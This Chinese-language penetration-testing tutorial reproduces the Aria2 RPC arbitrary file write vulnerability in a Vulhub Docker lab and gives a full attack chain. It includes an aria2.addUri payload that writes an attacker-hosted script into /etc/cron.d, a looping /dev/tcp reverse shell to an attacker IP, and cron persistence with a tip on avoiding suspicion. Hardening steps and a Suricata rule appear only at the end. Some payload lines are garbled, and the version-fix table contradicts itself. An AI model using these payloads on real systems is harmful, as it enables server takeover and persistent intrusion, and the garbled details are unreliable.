别再只测RCE了!手把手教你复现Aria2任意文件写入漏洞(附Docker靶场搭建)

张开发
2026/4/18 21:03:01 15 分钟阅读

分享文章

别再只测RCE了!手把手教你复现Aria2任意文件写入漏洞(附Docker靶场搭建)
从零构建Aria2任意文件写入漏洞实战靶场渗透测试进阶指南在安全研究领域漏洞复现往往被简化为验证存在性的机械操作而忽略了其作为攻防演练核心环节的真正价值。Aria2作为一款广泛使用的多协议下载工具其任意文件写入漏洞CVE-2018-10887的典型复现方式通常止步于RCE验证这就像只学会了开保险箱却不知道如何处置里面的财物。本文将带您突破传统复现的局限通过全链路实战演示从Docker环境搭建到漏洞深度利用最终实现持久化控制的完整攻击路径。1. 靶场环境科学搭建1.1 容器化漏洞环境构建现代渗透测试已经进入容器化时代使用Docker部署漏洞环境不仅能实现隔离测试更能快速还原真实业务场景。我们选择Vulhub作为基础镜像库这是目前最活跃的开源漏洞环境集合之一。# 下载最新版Vulhub git clone https://github.com/vulhub/vulhub.git cd vulhub/aria2/rce # 构建并启动容器 docker-compose build --no-cache docker-compose up -d启动后检查容器状态时有经验的测试者会特别注意端口映射情况docker ps --format table {{.ID}}\t{{.Names}}\t{{.Ports}}预期输出应显示6800端口已映射到宿主机这是Aria2的RPC服务端口。常见问题排查表现象可能原因解决方案端口未暴露docker-compose.yml配置错误检查ports字段格式应为6800:6800服务未启动容器启动命令错误确认entrypoint包含--enable-rpc参数连接被拒绝防火墙规则限制临时关闭firewalld:systemctl stop firewalld1.2 RPC接口验证与调试与传统认知不同直接访问http://ip:6800 会显示空白页面——这实际上是正常现象因为Aria2的RPC接口需要特定格式的请求。我们可以使用curl进行基础验证curl -X POST http://localhost:6800/jsonrpc -d { jsonrpc:2.0, id:QXJpYTY, method:aria2.getVersion }成功响应应包含版本信息类似{ id: QXJpYTY, jsonrpc: 2.0, result: { enabledFeatures: [Async DNS, BitTorrent], version: 1.33.1 } }2. 漏洞原理深度解析2.1 文件写入机制剖析Aria2的任意文件写入漏洞源于对RPC接口参数缺乏充分校验攻击者可以通过控制三个关键参数实现文件操控dir参数指定下载文件存储目录out参数设置下载文件的保存名称rpc-save-upload-metadata保存上传的元数据文件这三个参数组合使用时攻击者可以覆盖系统关键文件如/etc/passwd创建计划任务脚本/etc/cron.d/写入SSH公钥~/.ssh/authorized_keys2.2 漏洞利用条件矩阵并非所有环境都能直接利用该漏洞下表列出了关键影响因素条件维度有利场景不利场景应对策略运行权限root用户普通用户寻找可写系统目录目录限制无限制chroot环境尝试相对路径穿越文件存在可覆盖不可写追加写入过滤机制无过滤内容检查使用编码/混淆技术3. 可视化攻击界面配置3.1 YAAW控制台高级用法虽然可以直接构造JSON-RPC请求但使用YAAWYet Another Aria2 Web前端能显著提升操作效率。关键配置步骤如下访问https://binux.github.io/yaaw/demo/点击右上角扳手图标进入设置配置JSON-RPC路径为http://靶机IP:6800/jsonrpc设置自动刷新间隔为5秒便于监控状态注意现代浏览器可能会阻止混合内容请求若靶机使用HTTP协议建议在Chrome中启用chrome://flags/#unsafely-treat-insecure-origin-as-secure3.2 下载任务精心构造创建恶意下载任务时参数配置需要特别技巧{ jsonrpc: 2.0, id: exploit, method: aria2.addUri, params: [ [http://攻击机IP/shell.sh], { dir: /etc/cron.d, out: root, rpc-save-upload-metadata: false } ] }参数组合效果说明dir指定写入目录为计划任务文件夹out设置文件名为rootcron.d下的任务文件文件内容为从攻击机下载的shell脚本4. 持久化攻击实战演示4.1 反弹Shell精心构造传统反弹Shell脚本在容器环境中往往失效我们需要针对性优化#!/bin/bash # 容器环境专用反弹脚本 while true; do bash -c exec 9/dev/tcp/攻击机IP/4444;exec 09;exec 19 21;/bin/bash --noprofile -i sleep 60 done脚本特点添加无限循环确保连接断开后重连使用文件描述符重定向增强稳定性避免加载profile提高隐蔽性4.2 计划任务巧妙植入通过漏洞写入/etc/cron.d/root文件注意格式要求* * * * * root /etc/cron.d/shell 21 | logger -t aria2-exploit关键细节必须包含执行用户root通过logger记录输出避免引起怀疑使用全路径执行防止环境变量问题4.3 手动验证与排错当自动反弹失败时需要进入容器手动排查docker exec -it 容器ID /bin/bash -c ls -la /etc/cron.d; cat /etc/cron.d/root常见问题处理指南权限不足检查文件所有者是否为root格式错误确认cron文件符合规范路径错误使用which bash确认解释器位置网络隔离验证容器到攻击机的连通性5. 防御加固与检测方案5.1 安全配置清单对于必须使用Aria2的环境建议实施以下防护措施[ ] 使用--rpc-secret参数启用认证[ ] 设置--rpc-listen-allfalse仅监听本地[ ] 通过iptables限制访问源IP[ ] 定期更新到最新安全版本[ ] 使用非root用户运行aria2c5.2 入侵检测规则示例以下Suricata规则可检测漏洞利用尝试alert http any any - any 6800 (msg:Aria2 Arbitrary File Write Attempt; flow:to_server; content:POST; http_method; content:aria2.addUri; content:/etc/cron.d; content:out; distance:0; metadata:service http; sid:20240801; rev:1;)5.3 漏洞修复时间线版本修复状态补丁特性升级建议1.33.0受影响无防护必须升级1.33.0部分修复路径限制建议升级1.36.0完全修复RPC认证推荐版本在实际渗透测试项目中我们发现许多企业虽然升级了Aria2版本但由于配置不当如未启用RPC认证仍然暴露在风险中。有一次在内网测试时通过该漏洞成功获取了Jenkins服务器的控制权正是因为管理员只更新了二进制文件却忽略了配置调整。

更多文章